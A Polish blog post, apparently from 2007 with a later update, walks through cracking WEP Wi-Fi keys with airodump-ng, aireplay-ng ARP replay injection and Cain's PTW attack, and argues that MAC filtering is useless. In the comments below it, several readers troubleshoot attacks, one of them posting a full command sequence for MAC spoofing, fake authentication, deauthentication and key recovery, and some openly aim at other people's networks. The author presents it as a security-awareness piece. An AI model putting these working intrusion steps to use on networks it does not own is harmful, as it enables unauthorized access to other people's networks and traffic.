Ponieważ, z tego co widzę, łamanie WEP cieszy się zainteresowaniem, przedstawię tutaj krótką instrukcję "jak złamać WEP". Głównie chodzi mi o uświadomienie ludziom, że WEP nie jest bezpieczny, a ewentualne "filtrowanie po MAC" to tylko iluzja jakiegokolwiek bezpieczeństwa.
Jak złamać WEP - krótki przewodnik
Mała uwaga o tym, że czas biegnie
Ten wpis powstał w 2007 roku wkrótce po opublikowaniu informacji na temat ataku PTW. Od tego czasu świat się zmienił, dostępne są inne narzędzia i te same zadania można zrealizować w łatwiejszy i wygodniejszy sposób. W szczególności całe zadanie związane z łamaniem WEP można wykonać z poziomu BackTrack 4, nie ma potrzeby korzystania z dodatkowych narzędzi poza tymi, które dostępne są w tym środowisku. Nie zmieniło się jedno: zabezpieczenia WEP są bardzo łatwe do złamania, w związku z czym nie należy z WEP korzystać.
Drugim tematem, na który należy zwrócić uwagę, jest dostępność innych, dobrze napisanych i zrozumiałych przewodników dotyczących łamania WEP. Wiele z nich związanych jest z projektem aircrack-ng. Kilka z nich wymieniam poniżej:
- Wprowadzenie dla początkujących: Aircrack-ng Newbie Guide for Linux,
- Przewodniki dotyczące łamania zabezpieczeń sieci WEP: Simple WEP Crack oraz Simple WEP Crack tutorial flowchart and when to use each tool,
- Jak łamać sieć WEP bez podłączonych klientów: How to crack WEP with no wireless clients,
Więcej tego typu przewodników i instrukcji korzystania z narzędzi pakietu aircrack-ng dostępnych jest na stronach projektu.
Dla osób zainteresowanych bezpieczeństwem sieci korzystających z WPA-PSK oraz WPA2-PSK ciekawy może być ten przewodnik: How to Crack WPA/WPA2. Należy pamiętać, że na chwilę obecną bezpieczeństwo sieci korzystającej z WPA-PSK i WPA2-PSK zależy przede wszystkim od jakości wybranego hasła.
Pozostała część wpisu pochodzi z 2007 roku.
Narzędzia
Na początku zbierzmy narzędzia. Łamanie WEP przedstawię na prostych przykładach:
Dlaczego akurat taki zestaw? Cóż, nie przekonałem się do linuksa na desktopie (na laptopie tym bardziej), więc jestem zadowolonym użytkownikiem Windows XP, który jednocześnie nie chce wydawać kilkuset złotych na tę zabawkę (AirPcap). Windows Vista potrafi już bezpośrednio sniffować połączenia wireless, ale mój stary Dell C540 raczej nie byłby dobrą platformą dla tego systemu (wiem, instalowałem na nim i Beta2 i wersje testowe). Istnieje kilka dystrybucji LiveCD przeznaczonych dla pentesterów, BackTrack jest tą, którą używam, choć kiedyś również przymierzałem się do Pentoo. Próbowałem również kilka innych wersji, ale jakoś BackTrack był najbardziej użyteczny. Wadą BackTrack jest to, że aircrack-ngna nim obecnie dostępny nie wspiera ataku PTW. Cain za to atak PTW jak najbardziej wspiera.
Etapy zadania
Całość ataku można podzielić na etapy:
- Wybór celu,
- Zbieranie IVS,
- Łamanie klucza,
Wybór celu
Z poziomu LiveCD należy uruchomić airodump-ng nazwa_interfejsu, na ekranie pojawi się informacja o wykrytych sieciach, w szczególności informacje o:
- BSSID, czyli w praktyce adresie MAC AP,
- ESSID, czyli nazwie sieci (o ile jest dostępna),
- informacja o kanale, na którym działa sieć,
Pojawi się również informacja o stacjach, które w tej sieci są aktywne. Warto zapisać sobie kilka ich adresów MAC, bo przydadzą się później.
Zbieranie IVS
Aby złamać klucz WEP potrzeba trochę (dużo) IVS. "Klasyczny" atak potrzebował od 250 000 do 1 000 000, dla ataku PTW liczba 100 000 jest zwykle wystarczająca. Jak je zebrać? Można je zebrać pasywnie, można również przyśpieszyć proces zbierania poprzez atak arp replay. Jeśli w sieci jest duża aktywność, można uzbroić się w cierpliwość i czekać, ja jednak tej cierpliwości nie mam zbyt wiele... Poza tym zdając się na cierpliwość, raczej nie uda się szybko przeprowadzić ataku PTW, ponieważ po prostu nie będzie odpowiednich danych zebranych. Konieczny jest więc atak arp replay, czyli:
aireplay-ng --arpreplay -b BSSID -h MAC nazwa_interfejsu
Ważne, by adres MAC był aktywny w sieci. Nie jest to wymagane, ale wówczas należy wykonać kilka dodatkowych kroków, bo bez nich AP może najnormalniej na świecie ignorować będzie wstrzykiwane pakiety. Przed uruchomieniem tego polecenia warto jest przestawić kartę w pracę na odpowiednim kanale, czyli:
iwconfig nazwa_interfejsu channel numer_kanalu
Na początku nie dzieje się nic, ale po znalezieniu pierwszego pakietu ARP zaczyna się atak (można również odczytać pakiety ARP z wcześniej zapisanego pliku). Wówczas należy uruchomić polecenie (można i wcześniej, zamiast airodump-ng z powodzeniem można wykorzystać zwykły tcpdump):
airodump-ng -w nazwa_plikow --channel numer_kanalu -i nazwa_interfejsu
Następnie należy po prostu obserwować jak rośnie ilość zebranych danych. Niestety, airodump-ng nie informuje bezpośrednio jak wiele IVS zostało zebrane, więc w oddzielnej konsoli warto od czasu do czasu uruchamiać polecenie:
aircrack-ng *.cap
Tutaj jedna uwaga - niektóre karty (sterowniki) mają problemy z jednoczesnym sniffowaniem i wstrzykiwaniem pakietów. Ja korzystam z karty na Ralinku i jest z nią jeden problem - zanim karta zostanie podniesiona przez:
ifconfig ral0 up
musi zostać przestawiona w monitor mode przez:
iwconfig ra0 mode monitor
Jeśli to nie zostanie wykonane, wstrzykiwanie pakietów nie będzie działać, lub będzie działać do czasu, gdy uruchomiony zostanie jakiś sniffer wymagający trybu monitorującego, albo przestanie wstrzykiwać pakiety po 367 wysłanych...
Kiedy przestać? Ja bym sugerował poczekać tak do 100 000 IVS, choć skutecznie udawało mi się łamać sieci po zebraniu 40 000. To i tak trwa tylko chwilę, właśnie w jakieś 5 minut włamałem się do siebie :)
Łamanie
Teraz należy przejść pod Windows i uruchomić Caina. Zakładam oczywiście, że zebrane pakiety zostały przeniesione pod ten system lub są na kluczu USB. Tutaj w Cracker->802.11 Captures należy zaimportować zebrane pakiety, zaznaczyć zrzut na liście i przeanalizować go (Analyze). Otrzymuje się wówczas informację o zebranych IVS, w szczególności o ilości tych, które nadają się do ataku PTW. Po zaznaczeniu sieci można wybrać jeden z ataków. Jeśli wykorzystany był arp replay, to oczywiście wybrać należy PTW.
Jak to jest skuteczne?
Bardzo. W ciągu mniej niż 3 minut (142 sekundy) zebrałem właśnie 86 055 unikalnych IVS, z czego 75 403 nadaje się do ataku PTW. Atak kończy się powodzeniem...
Dlaczego filtrowanie po MAC niewiele daje?
Dlatego, że adres MAC można zmienić (co kończy dowód). Na przykład przy pomocy narzędzia macchanger, choć w linuksie ifconfig ma opcję ustawiania adresu MAC (w *BSD zresztą też). W Windows również jest to możliwe, choć tutaj już muszą wspierać to sterowniki (te do Ralinka akurat to w spierają bez większych problemów).
UWAGAProszę nie zadawać w komentarzach pytań co i jak zrobić, bo nie będę na nie odpowiadał. Napisałem ten tekst, by pokazać, że złamanie WEP to chwil kilka i nie można polegać na tej metodzie zabezpieczenia sieci bezprzewodowych. Każdy, kto naprawdę chce złamać sieć, zrobi to bez trudu, na podstawie dostępnych w Internecie materiałów. Google wszystko wiedzą...
UWAGA JESZCZE RAZTak jak pisałem wcześniej, proszę NIE ZADAWAĆ pytań, bo nie będę na nie odpowiadał. Jeśli ktoś chce złamać WEP, a powyższa (nieco uproszczona instrukcja) jest dla niego zbyt trudna, znaczy to najprawdopodobniej, że nie powinien tego robić...
Bardzo Ciekawy i przydatny artykuł. Szkoda że sobie nie umiem poradzić (pewnie brak doświadczenia). Mam owy problem: "airodump-ng nazwa_interfejsu"
zaraz na początku w miejsce interfejsu. Próbowałem skonfigurować po przez:
-ifconfig eth0
-ifconfig eth0 promisc
-ifconfig eth0
airodump-ng promisc (próbowałem też eth0 wpisać) ale chyba mylę pojęcia. Nie proszę o pomoc w postaci podania rozwiązania na tacy tylko małej wskazówki dzięki której zrozumiem błąd który popełniłem.
Pozdrawiam
ifconfig -a
Sprawdź, która jest kartą WiFi (iwconfig powinno to powiedzieć),
W zależności od tego jaka to jest karta, konfiguruje się ją przy pomocy iwconfig lub wlanconfig (atheros).
Tylko wydaje mi sie, ze jest pewna niescislosc - u mnie airodump (z backtrack-a 2) jak najbardziej podawal ilosc zebranych IVS, a mianowicie w kolumnie #Data, tak wiec stwierdzenie: "airodump-ng nie informuje bezpośrednio jak wiele IVS zostało zebrane, więc w oddzielnej konsoli ..." nie wydaje mi sie sluszne.
Poza tym super, dzieki
Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
Ale w wolnej chwili sprawdzę ten szczegół.
Niestety, jak zwykle się gdzieś pogubiłem. Już przy pierwszym wywołaniu airodump-ng wifi0 dostałem błąd o niemożliwości ustawienia monitor mode (error setting monitor mode). Spróbowałem więc ustawić ten tryb poprzez iwconfig, tak jak to opisałeś. Niestety również bez skutku (Set failed on device wifi0; Invalid argument). Próbowałęm ze wszystkimi interfejsami, za każdym razem mam ten sam błąd.
Kartę mam od TP-Linka (Atheros), więc nie spodziewam się, że to jej wina.
Mogę Cię prosić o pomoc? Gdzie szukać rozwiązania?
W szczególności wlanconfig create i wlanconfig destroy.
potem ci wyswietli kary na kktoryych masz wlaczony monitor
lo -no wireless extensions
eth0 - no wireless extensions
prosze o rade
gdy wpisuje iwconfig pojawia mi sie
lo no wireless extensions
eth0 no wireless extensions
prosze o porade
"wlanconfig ath0 destroy"-poczlo,
nastenie:
"wlanconfig ath0 create wlandev wifi0 wlanmode sta" wyrzucilo"ath0"-poczło
następnie wklepałem:
"aireplay-ng --arpreplay -b 00:1B:11:FF:14:84 -h 00:13:02:C0:7A:B7 ath0"
i błąd:
"ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211
or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled:
run 'ifconfig ath0 up; iwconfig ath0 mode Monitor channel '
Sysfs injection support was not found either."
co w takiej sytuacji powinienem zrobić?
acha, a na komende:
"airodump-ng -w out ath0" wypluwa:
"ioctl(SIOCSIWMODE) failed: Invalid argument
Error setting monitor mode on ath0"
a co ciekawsze na poleceni iwconfig podaje:
"ath0 (...) Mode:Managed (...)"
Bardzo prosze o pomoc...
aireplay-ng --arpreplay -b BSSID -h MAC nazwa_interfejsu wyskakuje taki komunikat:
"The interface MAC (adres mac) doesn't match the specified MAC (-h).
ifconfig eth1 hw ether (adres mac)
Saving ARP requests in .... .cap
You should also start airodump-ng capture replies.
Dalej pobiera dane ale przy ARP ciagle widnieje ) czyli nie dostaje zadnego pakietu ARP, w czym problem, aha karta pracuje na okreslonym kanale i w trybie mode monitor.
http://allegro.pl/item286038506_wyprzedaz_atheros_ar5001_108mbps_na_100mw_gwa_fv.html
Karta ma złącze antenowe, co czasami bywa dość przydatne.
W jaki sposób vista potrafi bezpośrednio sniffować połączenie wireless.
Prosze o mała podpowiedz.
Z góry dzięki!!!
Jeśli możesz odezwij się na moje GG 2295350
Na moje oko karta powinna działać pod windą ze sterownikami od AirPcap.
Jeśli tylko dobrze zagłębiłem się w temat to ta karta jest identyczna z produktami AIR CACE
Mam takie krotkie pytanie dolaczajac sie do postu kolegi. Mianowicie przy probie ataku ARP nie wykrywa ARP request przez co nie przeprowadza ataku. Mam podejrzenie ze chodzi o sterownik karty (Intel). Dodatkowo czesto w dumpie zle wykrywa szyfrowanie (WPA zamiast WEP). Jakis komentarz?
Dziekuje.
mam pytanie zwiazane z karta,
jaka najlepsze karta by byla do łamania wepa i zbierania ivsow.
SLOT: PCI
pozdrawiam
15:10:54 Waiting for beacon frame (BSSID: 00:07:40:A2:F6:7E) on channel 11
Saving ARP requests in replay_arp-0403-151055.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
write failed: Cannot allocate memory and 160 ACKs), sent 652 packets...(499 pps)
wi_write(): Illegal seek
aireplay-ng --arpreplay -b BSSID -h MAC nazwa_interfejsu czyta pakiety i po pewnym czasie znajdzie 1 pakiet ARP (got 1 ARP requests) lecz nad pakietami wysklakuje mi komenda
Noteice: dot a deauth/disassoc packet. Is the source MAC assosiated?
co rbie zle ?
z gory dzieki.
#17: jesteś blokowany przez Access Pointa: po prostu ignoruje twoje pakiety, wysyłając co jakiś czas pakiet deauth.
czy miałeś komunikat "Association successful ;-)" jeśli nie to musisz się zalogować najpierw do sieci(atak -0 lub -1)
Jeśli tak to znaczy że AP potrafi się obronić przed iniekcją, tutaj już chyba nic nie zrobisz(możesz spróbować dużo wolniej), albo poczekać aż ktoś się podłączy i go sprzątnąć;)
A może masz słaby zasięg?
#18
trzeba czekać i próbować, sprawdzić czasem czy dostajesz beacony co 0,1 s czy ile tam jest ustawione(w sensie zasięg).
Przeczytałem cały powyższy artykuł (łącznie z uwagami i choć wiem, że autor wpisu mi nie pomoże, to może ktoś inny to jeszcze czyta, i da mi jakieś wskazówki i mam następujący problem. Po wpisaniu w konsoli "aireplay-ng
--arpreplay -b BSSID nazwa_interfejsu" i znalezieniu jednego pakietu ARP (podobna sytuacja
jak w komentarzu 17 do powyższego artykułu) zaczyna się niby wstrzykiwanie pakietów, ale
ciągle otrzymuję wpisy o treści "Notice: got a deauth/disassoc packet. Is the source MAC
associated ?".
Luki odpisał i tu zaczynają się moje pytania:
1. Co to jest atak -0 lub -1 - jak się zalogować do tej sieci?
2. Skąd będę wiedział, gdy ktoś się podłączy do sieci?
3. Jeśli wpisałbym polecenie "aireplay-ng --arpreplay -b BSSID -h MAC nazwa_interfejsu",
to muszę znać MAC, który jest aktywny w sieci, czyli jakiś komputer z niej korzystający,
tak? I tu powrót do pytania drugiego i skąd ten MAC wziąć?
4. Ostatnie, może banalne pytanie... Jak uruchomić drugą konsolę w BackTrack 4, żeby
airodumpem ewentualnie zbierać pakiety, gdyby udało mi się je wstrzyknąć do sieci?
Próbowałem różnych komend, ale nie uruchamiają drugiego terminala.
Znalazłem ten przewodnik, gdy chciałem dla zabawy złamać własną sieć. Udało mi się! Prosta sprawa!
Jednak nie chcę tu się chwalić jak gładko mi poszło, nie chcę też o nic pytać. Chcę jedynie przedstawić swoją opinię na temat tego poradnika.
Generalnie Panie Autorze informacje zawarte na tej stronie są bardzo przydatne i teoretycznie wystarczające, jednak wyrazam przynajmniej zarozumialstwa jest tekst na końcu opisu "Tak jak pisałem wcześniej, proszę NIE ZADAWAĆ pytań, bo nie będę na nie odpowiadał. Jeśli ktoś chce złamać WEP, a powyższa (nieco uproszczona instrukcja) jest dla niego zbyt trudna, znaczy to najprawdopodobniej, że nie powinien tego robić...".
Rzecz w tym że nie każdy jest biegłym użytkownikiem Linuxa i nie każdy wie co znaczy np. bo interfejs to pojęcie dość szerokie, mogące odnosić się do wielu wariantów pracy systemu. Przewodnik jest pełen takich "niedoróbek".
Ja generalnie praktycznie nie używam Linuxa i było dla mnie problemem na samym początku zrozumienie co mam wpisać w oknie konsoli, pomogły komendy "help" poszczególnych aplikacji.
Podsumowując: Jeśli pisze Pan, Panie Autorze jakikolwiek poradnik, weźmie Pan pod uwagę, że nie wszyscy są tak mądrzy i wszechstronni jak Pan, a brak tej mądrości oraz wszechstronności nie oznacza że ci ludzie są debilami.
Pozdrawiam
"Ważne, by adres MAC był aktywny w sieci. Nie jest to wymagane, ale wówczas należy wykonać kilka dodatkowych kroków, bo bez nich AP może najnormalniej na świecie ignorować będzie wstrzykiwane pakiety"
Możesz choć troszkę to rozwinąć bo nie wiem nawet jakie zapytanie zapodać do gugla.
PS: to jedynie normalnie i przejrzyście napisany poradnik jaki znalazłem w sieci.
http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients
Opisano wszystko bardzo dokladnie,stosuja jak instrukcje mozhlive zrobicz realne wzlamane WEP, co gładko mi poszło nie jeden raz. Sorry za pomylki, nie jestem polakem.
oddaje mi jakieś 30 ARPów z czego tylko połowa z IVSami. Jeżeli, natomiast, adres MAC nie jest aktywny w sieci, żaden przechwycony pakiet nie zawiera IVSów(pomimo ich ogromnej ilości - przez noc złapałem >3500000). Dodam, że adres MAC
odłączonego już komputera mam sklonowany na
siebie...
Mam ten sam problem ze wstrzyiwaniem pakietów co kolega Maciek.
Mam karte na chipsecie:
ralink ra61 i system bt3
Mianowicie airodump pięknie mi się
odpala i zbiera pakiety, odpalam wstrzykiwanie pakietów, efekt widoczny w konsoli wstrzykiwania jest pozytywny (zbiera pięknie ARP) ale nawet poz zebraniu powyżej 1000 ARP IVS-y nie chcą wcale lecieć szybciej, dioda na karcie sieciowej która zawsze mryga przy wysyłaniu informacji nie włącza się nawet na chwile. Czy ktoś z Was ma tak jak ja? Jak uporać się z tym problemem?
P.S.
Czy w momencie kiedy mam zebranych już kilka ARP i klient podłączony do sieci od którego zbieram ARP odłączy się to czy aireplay nadal będzie mi nabijał IVS-y?
Pozdro dla wszystkich...
Mam taki problem, że skacze mi po kanałach mimo że wpisałem mu wcześniej
iwconfig nazwa_interfejsu channel numer_kanalu
Po za tym ivs zbiera mi bardzo powoli ok. 1 IVS na 2 sek. Czy jest na to jakaś rada?
Filtrowanie po MACu można traktować jako mały dodatego do systemu zabezpieczeń i uważam, że powinno się go stosować.
pozdrawiam
nie bierz się w ogóle do tego artu bo NIC nie skumasz....
http://www.allegro.pl/item473985661_tplink_tl_wn610g_antena_panelowa_backtrack_2_0.html
to lekarstwo na 8IVS
moj problem tkwi w tym :
wszystko zrobilem tak jak jest napisane , tylko jak wlanczam airodump-ng -c () -w() -bssid() eth1 zaczyna mi pobierac pakiety tylko strasznie powoli 10min kilka #date ,,, mam 2 sieci zabespieczone wep i na obydwu tak sie dzieje wie ktos o co kaman ???
probowalem na wlasnym ap i wszystko dzialalo zlamalem keya
prosze o pomoc
A analfabetów (wtórnych/funkcjonalnych) jest więcej niż się może wydawać. Bo nikt nikomu łopatą do głowy wiedzy nie włoży...
Mam problem z wybraniem interfejsu jak wpisuje np wlan0 to pisze "Adapter not supported" albo "No interface specified"
karta wifi to Intel Pro/Wireless 2200BG w Dell'u D610 sterowniki zainstalowane pod ta karte.Próbuje na windowsie nie na linuxie moze dlatego niewyszukuje karty.Jak ktos wie oco w tym chodzi prosił bym o kontakt pod e-mail : [email protected] lub gg:5111621 z Góry Dzieki Pozdrawiam
po wpisaniu aireplay-ng --arpreplay -b () -h() interfrejs pisze tylko ze czyta pakiety(i to wolno-10 pak/s)a nie ma ani ARP i pps tyko co 5 min pojawia sie ACK.Moze ktos mi pomoc??
Czy to mozliwe ze w laptopie Amilo PI 2530 z karta bezprzewodowa Intel(R)Pro/Wireless 3945ABG moze nie wykrywać BackTrack 4?
Nic sie nie da zrobic zeby ja wykrywało?
po wpisaniu iwconfig wykrywa mi tylko
lo
eth0
oczywiscie wszystkie no wireless extensions
prosze o pomoc
Uzywam backtrack3, katra proksim orinoco (atheros).
Możliwe, że mój post komuś pomoże
Zaczynam
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
w ten sposób ustawiam karte w tryb monitoringu inaczej nie dałem rady
ifconfig ath0 down
macchanger --mac 00:11:22:33:44:55 ath0
ifconfig ath0 up
zmiana adresu mac
wcześniej spisałem numer kanału, mac AP (bssid) i nazwe sieci(essid)
airodump-ng -c (kanał) --bssid (mac AP) -w (nazwa pliku) ath0
otwieram kolejne okno terminala
trzeba się zalogować bo nic nie wstrzyknę
aireplay-ng -1 0 -e "nazwa AP" -a (mac AP) -h 00:11:22:33:44:55 (moj mac) ath0
zauważyłem, że jeżeli nazwa sieci składa się z dwóch wyrazów oddzielnych należy zastosować cudzysłów, jeżeli jeden wyaz to bez niego.
Otwieram kolejne okno
aireplay-ng -3 -b (mac AP) -h (mój mac) ath0
tutaj wstrzykujemy pakiety, może to trochę potrwać, przyspieszamy ten manewr.
otwieramy kolejne okno
aireplay-ng -0 5 -a (mac AP) -c (mój mac) ath0
tutaj wysyłamy pakiet (deauth) który rozłącza nas z AP po takim działaniu szybciej nazbieramy ARP. Osobiście najpierw się logowałem, potem (deautch) rozłączenie i znowu się zalogowałem i ARP poszły błyskawicznie.
Czekasz aż się nazbiera odpowiednia iloś (IVs)
Jak nazbieram około 40000 IVs to zaczynam dalej, ale to minimalna ilość przy której zaczynam.
Otwieram już ostatnie okno terminala
aircrack-ng -z pakiety-01.cap (nazwa pliku, pamietać należy o ścieżce dostępu)
Pamietać należy, jeżeli klucz jest 64 bit to startujemy od min. 40000 IVs natomiast jeśli 128 bit to dopiero min. 85000 IVs
Nie musisz wyłączać aircracka sam dobiera sobie IVs jeśli ma zamało.
Pozdro i zycze powodzenia
Ps. mi nikt nie pomagał, dlatego chcę się z wami podzielić tym co wiem.
---------> TO JEST TO
aireplay-ng -1 0 -e "nazwa AP" -a (mac AP) -h (moj mac) moj_interfejs
Chyba, że tylko testujecie w domku sobie, ale na rzeczywistych sieciach w 90% przypadkach nie da rady się włamać a tylko dzięki wstrzykiwaniu pakietów można w skończonym zadawalającym czasie uzyskać po 100 tys. pakietów. Mi tam przy każdej z 12 sieci na których próbowałem zawsze i zawsze wyskakuje komunikat:
Sending Authentication Request (Open System)
Nie da rady po prostu. To mit, że zabezpieczenia WEP, WPA, WPA2 da się złamać. Przecież admnini nie śpią, już dawno doszli do tego jak zapobiegać tym śmiesznym opisanym powyżej metodom.
hugo to moze nam wielki hakerze napiszesz jak sie łamie WPA i WPA2 , bo coś mi się wydaje że jeszcze się ze snu nie obudziles.
Jestem niestety na poczatku tej drogi, wiec zapytam prosto z mostu jak skonfigurowac karte WIFI na usb karta DLINK DWA125 na Atherosie, dodam ze dzialam na konsoli VMware Workstation 5.5, system mam 64x,niestety jestem zielony w komendach linuksowych i chcialbym bardzo uruchomic karte usb w jakis trybik naslychu badz inny..przy iwconfig wyskakuje mi :
lo no wireless connections
ath0 no wireless connections
od czego mam zaczac, jak to ugrysc
oddzwiecze za jakokalwiek pomoc
romek
Nie posiada narzędzia spoonwep.
Ale można odpalić w trybie persisent czy jakoś tak
i zapisuje wszystkie zmiany.
Jak ktoś nie wiem jak do takiego trybu przygotować
pendrive to niech pisze, wytłumaczę (zalecany pendrive 4GB)
Teraz pod windowsem łącze sie z ta siecia podaje haslo i potwierdzam haslo. Komputer ma ustawione automatyczne pobieranie adresu ip. Po jakims czasie przypisuje sobie ip brame i mam komunikat ograniczone polaczenie lub brak polaczenia.
Moze router ma wlaczone filtrowanie MAC. Jak to sprawdzic czy tak jest.
łamanie hasla zajelo okolo 1 godziny. Tylko teraz jest problem z polaczeniem.
KEY FOUND! [11:22:33:44:55]
You may use this key without the ”:” in your favorite client. This means you enter “1122334455” into the client and specify that the key is in hexadecimal format. Remember that most keys cannot be converted to ASCII format.
Tłumaczenie chyba zbędne.
Dawno tu nie zaglądałem i dziwię się temu co Ludzie tu wypisują.
Kiedyś wyczytałem, że "Jeśli nie możesz złamać WEP tzn, że nie powinieneś tego robić".
Też kiedyś byłem zielony, ale powiem Wam, że upór i google mogą zdziałać cuda
W tej chwili poszedłem na łatwizne i kupiłem na ebay od chinoli kartę na usb 1000 mw. Dali Backtracka4 po chińsku i fajne narzędzie spoonwep.
Od tej pory nie muszę sie produkować i wszystko idzie gładko.
Pozdrawiam i życze dobrej zabawy.
forum-backtrack.pl
Czy moja karta (Dell Wireless 1397 WLAN MiniCard) Obsłuży monitor mode? Czy są jakieś Sterowniki obsługujące monitor mode do tejże karty?
Jeszcze dziś spróbuję złamać hasło do wifi na backtracku. Jeżeli mi się nie uda to BUMPnę.
Pozdrawiam
Jeśli odpalę wi-fi bez hasła, to mój ruch nie jest w żaden sposób szyfrowany i każdy sąsiad widzi wszystko co robię w sieci jako plaintext ?
A jeśli ustawię hasło (nie ważne czy użyję wep, wpa, czy czegoś innego) to już moje połączenie jest zaszyfrowane, bezpiecznie lub nie, ale nie będzie to już plaintext.
dobrze rozumiem?
pozdrawiam i milego uzytkowania za darmo